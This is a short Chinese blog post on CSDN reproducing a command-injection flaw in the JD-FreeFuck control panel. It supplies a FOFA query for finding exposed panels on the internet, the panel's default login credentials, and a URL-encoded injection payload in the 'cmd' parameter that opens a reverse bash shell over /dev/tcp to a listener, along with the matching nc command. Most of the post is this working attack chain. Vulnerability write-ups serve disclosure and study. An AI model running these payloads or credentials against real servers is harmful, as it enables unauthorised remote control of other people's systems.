JD-FreeFuck 后台命令执行漏洞

本文详细介绍了JD-FreeFuck项目存在的后台命令执行漏洞,该漏洞允许攻击者执行任意命令,控制服务器。通过FOFA搜索引擎可以找到受影响的系统,登录凭证为useradmin/supermanito。漏洞复现过程包括手动执行脚本和利用命令反弹shell。建议相关用户及时修复此安全问题。
摘要由CSDN通过智能技术生成

JD-FreeFuck 后台命令执行漏洞

漏洞说明

JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器

项目地址:https://github.com/meselson/JD-FreeFuck

环境搭建

脚本一键部署:

bash <(curl -sSL https://gitee.com/mjf521/JD-FreeFuck/raw/main/install.sh)

漏洞复现

FOFA搜索

title="京东薅羊毛控制面板"

访问后登录页面

image-20210413180417572

默认用户名密码:

useradmin
supermanito

image-20210413180601261

手动执行脚本---切换换行抓包

![屏幕截图 2021-04-14 100803](https://tomyyyyy.oss-cn-hangzhou.aliyuncs.com/img/屏幕截图 2021-04-14 100803.jpg)

然后发送包:

Snipaste_2021-04-14_10-17-58

反弹shell

cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2F192.168.1.101%2F44444+%3C%261'%3B+now

监听端:

nc -lvvp 44444
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值